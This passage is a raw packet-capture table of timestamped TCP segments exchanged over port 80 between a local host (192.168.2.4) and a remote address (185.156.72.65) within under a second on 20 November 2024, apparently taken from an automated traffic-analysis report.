                                                                Nov 20, 2024 05:02:19.521121979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.521126032 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521142960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.521155119 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.521156073 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521164894 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521173954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521190882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.521209955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.521893978 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521904945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521914959 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521929026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.521934986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521945000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521955013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521956921 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.521965981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521975040 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.521986008 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522006989 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522031069 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522420883 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522461891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522551060 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522559881 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522568941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522583008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522586107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522599936 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522605896 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522612095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522620916 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522630930 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522630930 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522640944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522651911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522659063 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522663116 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522686005 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522696018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522722960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522733927 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522743940 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522752047 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522766113 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522792101 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522937059 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522948027 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522972107 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522981882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.522989035 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.522991896 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523005009 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523009062 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523019075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523020029 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523029089 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523046017 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523067951 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523441076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523483038 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523485899 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523492098 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523509979 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523519039 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523528099 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523530006 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523554087 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523566008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523575068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523576975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.523603916 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.523624897 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583117008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583173990 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583208084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583219051 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583230972 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583242893 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583251953 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583261013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583273888 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583283901 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583285093 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583292961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583297014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583324909 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583337069 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583344936 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583348989 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583355904 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583368063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583376884 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583379984 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583400965 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583404064 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583414078 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583416939 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583441973 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583462000 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583695889 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583707094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583724976 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583734989 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583744049 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583756924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583758116 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583766937 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583775043 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583785057 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583796024 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583800077 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583811045 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583831072 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583831072 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583834887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.583858967 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.583888054 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.584391117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584431887 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.584482908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584495068 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584506989 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584520102 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584532022 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584544897 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584544897 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.584546089 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.584559917 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584570885 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.584595919 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.584626913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.584897995 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.584939003 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.584997892 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585007906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585020065 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585031986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585036993 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585042953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585047007 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585055113 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585067034 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585072041 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585098028 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585125923 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585222006 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585258007 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585294962 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585305929 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585325003 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585331917 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585339069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585347891 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585350037 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585361958 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585372925 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585374117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585397005 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585458040 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585892916 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585905075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585916996 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.585933924 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585947990 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585968018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.585995913 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586007118 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586018085 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586030006 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586039066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586050034 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586078882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586107969 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586119890 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586133003 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586153984 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586173058 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586177111 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586210966 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586214066 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586222887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586246014 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586253881 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586263895 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586265087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.586292028 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.586307049 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.587203026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.587214947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.587224960 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.587244987 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.587249041 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.587255955 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.587259054 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.587269068 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.587280989 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.587291956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.587292910 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.587310076 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.587594032 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.608598948 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608613014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608623028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608628035 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608638048 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608648062 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608658075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608669043 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608712912 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.608720064 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608731031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608741999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608762026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.608777046 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.608789921 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608798981 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608808994 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608819008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608828068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.608829021 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.608859062 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.608886957 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.609424114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.609467983 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.609541893 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.609550953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.609560966 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.609570980 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.609575987 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.609582901 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.609595060 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.609597921 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.609603882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.609627008 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.609641075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610299110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610311985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610323906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610336065 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610341072 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610356092 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610366106 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610366106 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610375881 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610385895 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610388994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610397100 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610408068 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610415936 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610418081 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610428095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610438108 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610445023 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610450029 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610466003 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610466003 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610477924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610481024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610487938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610497952 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610497952 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610522985 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610546112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610585928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610594988 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610601902 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610608101 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610616922 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610624075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610630035 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610645056 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610671997 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.610954046 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.610991955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.611243963 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.611285925 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.611329079 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.611347914 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.611360073 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.611367941 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.611371994 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.611382008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.611386061 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.611392975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.611406088 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.611428022 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.611454010 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.670816898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670828104 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670836926 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670861006 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.670866966 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670875072 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.670876980 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670886993 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670896053 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670902014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670911074 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.670943975 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.670979023 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.670989990 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671000004 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671010017 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671019077 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.671020985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671031952 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671039104 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.671062946 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.671190977 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671227932 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.671241045 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671284914 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.671310902 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671331882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671344042 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671353102 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671359062 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.671365976 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671376944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.671380997 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.671406031 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.671421051 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.672072887 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672081947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672092915 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672112942 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.672126055 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.672141075 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672152042 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672168970 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672179937 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672180891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.672193050 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672194958 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.672202110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:19.672221899 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.672239065 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:19.672637939 CET8049730185.156.72.65192.168.2.4
